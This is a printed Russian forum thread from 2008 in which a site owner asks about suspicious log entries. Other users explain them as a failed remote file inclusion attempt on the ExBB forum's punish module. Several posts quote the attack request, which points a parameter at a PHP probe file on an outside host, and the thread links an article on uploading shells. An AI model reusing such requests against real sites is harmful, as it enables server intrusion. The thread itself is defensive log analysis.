Strict Standards: Resource ID#34 used as offset, casting to integer (34) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#36 used as offset, casting to integer (36) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#37 used as offset, casting to integer (37) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Версия для печати :: Хак?
ТвойWeb » » ExBB - лучший форум на файлах » Хак?

Страниц (2): [1] 2 »
 

1. Axel Breitung - 07 Ноября, 2008 - 09:24:16 - перейти к сообщению
Может я преувеличиваю, но всеже меня смутил лог. Я недавно статейку читал где описывалась уязвимость PHP, тоесть как заливать шелл и как его использовать. Для хака нужен был другой хостинг... Ну вобщем смотрю я лог ошибок и вижу практически ту статейку:

CODE:
[error] [client 58.227.192.80] File does not exist: /home/breit/domains/mt-80club.ru/public_html/


Потом в обычном логе ищу по IPшнику и нахожу это:

CODE:
"GET /%20%20//modules/punish/p_error.php?exbb[home_path]=http://www.minart.org/bbs/data/ids.txt?


Смутило обращение к текстовику... Смотрю что в текстовике:

CODE:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>


Что это за фигня такая? Притом заметил, что права на файлы странным образом сменились 755, хотя были 644
2. Axel Breitung - 07 Ноября, 2008 - 13:00:07 - перейти к сообщению
сорри, но подымаю тему... Опять повторяется Однако
3. sergey144010 - 07 Ноября, 2008 - 15:57:32 - перейти к сообщению
повторяется что конкретно, по подробнее...

punish это что за мод?

на запросы типа
CODE:
p_error.php?exbb[home_path]=http://www.minart.org/bbs/data/ids.txt?

у меня HAK ATTAK
вроде всё нормально

вообще меня смущает exbb[home_path] и весь файл txt
что то там смысла я неуловлю,

давай весь лог сюда

разберём по частям, то что ты напостил
CODE:

[error] [client 58.227.192.80] File does not exist: /home/breit/domains/mt-80club.ru/public_html/

ето означает , что такой директории на сервере нет
CODE:

"GET /%20%20//modules/punish/p_error.php?exbb[home_path]=http://www.minart.org/bbs/data/ids.txt?

это какаято хрень, в надежде выполнить файл тхт

а файл тхт вообще какаято хрень, он должен возвращать вот этот текст - FeeLCoMz

вообщем пока непонятно мне
4. Axel Breitung - 07 Ноября, 2008 - 16:52:21 - перейти к сообщению
sergey144010 пишет:
повторяется что конкретно, по подробнее...


А все именно в той последовательности что я написал... Только в этот раз IP другой

Я сначала в еррор логе увидел

CODE:
[error] [client 58.227.192.80] File does not exist: /home/breit/domains/mt-80club.ru/public_html/


Я и сам поянл что такой дирректории нет, потому обратил внимание на IP.
И зашел в обычный лог и с помощью поиска по ip нашел строку

CODE:
"GET /%20%20//modules/punish/p_error.php?exbb[home_path]=http://www.minart.org/bbs/data/ids.txt?


Сразу скажу, что меня не первый раз хакнуть пытаются, от банального подбора паролей, до ддос атак, потому и слежу за логами...

sergey144010 пишет:
вообщем пока непонятно мне


Мне тоже непонятно...
Статейку про уязв. РНР читал здесь, может найдете что общего? http://old.antichat.ru/txt/old/dhgroup/PHP.shtml
5. Axel Breitung - 07 Ноября, 2008 - 16:54:35 - перейти к сообщению
sergey144010 пишет:
punish это что за мод?


Вроде штрафы... Но у меня максимум по одному штрафу у форумчан... тактчо злых быть недолжно
6. sergey144010 - 07 Ноября, 2008 - 17:21:31 - перейти к сообщению
выложи код файла своего p_error.php
7. Axel Breitung - 07 Ноября, 2008 - 17:32:22 - перейти к сообщению
CODE:
<?php
if (!defined('IN_EXBB')) die('Hack attempt!');

if ($fm->exbb['punish'] === TRUE && isset($fm->user['punned']) && ($total_pun = count($fm->user['punned'])) !== 0) {
include('modules/punish/data/config.php');
$fm->_LoadModuleLang('punish');
if ($total_pun == 5){
$fm->_Message($fm->LANG['MainMsg'],$fm->LANG['PunYouBlocked']);
}
if ($total_pun == 4 && ((time() - $fm->user['lastpun'])/86400) <= FM_PUNISH4){
$fm->_Message($fm->LANG['MainMsg'],sprintf($fm->LANG['PunYouBlockedDay'], FM_PUNISH4));
}
if ($total_pun == 3 && ((time()-$fm->user['lastpun'])/86400)<= FM_PUNISH3){
$fm->_Message($fm->LANG['MainMsg'],sprintf($fm->LANG['PunYouBlockedDay'], FM_PUNISH3));
}
}
?>
8. sergey144010 - 07 Ноября, 2008 - 17:43:34 - перейти к сообщению
пока незнаю что сказать, ничего особенного
9. yura3d - 08 Ноября, 2008 - 03:00:10 - перейти к сообщению
Axel Breitung
Это действительно хак, точнее попытка хака. На Вашем сервере пытались выполнить вражеский скрипт, подставляя путь к нему в переменную, которая должна содержать полный путь до скриптов форума на сервере. Но вся проблема в том, что в ExBB FM 1.0 Beta эта переменная не используется, поэтому данный метод взлома работать не будет
10. Axel Breitung - 08 Ноября, 2008 - 04:32:46 - перейти к сообщению
yura3d, спасибо за разъяснение! Растерялся
Еще такой вопросик, целью этого хака было получить права сервера и творить все что угодно?
Мне просто интересно кто это делал, либо вольные хацкеры у которых руки чешутся что-нибудь хакнуть прочитав статейку (типа той на которую я ссылку дал), либо целенаправленно мои конкуренты? Нахмурился

sergey144010, спасибо за желание помочь! Улыбка

Форум на AlfaSpace.NET


Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®
[Script Execution time: 0.0572]     [ Gzipped ]



Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33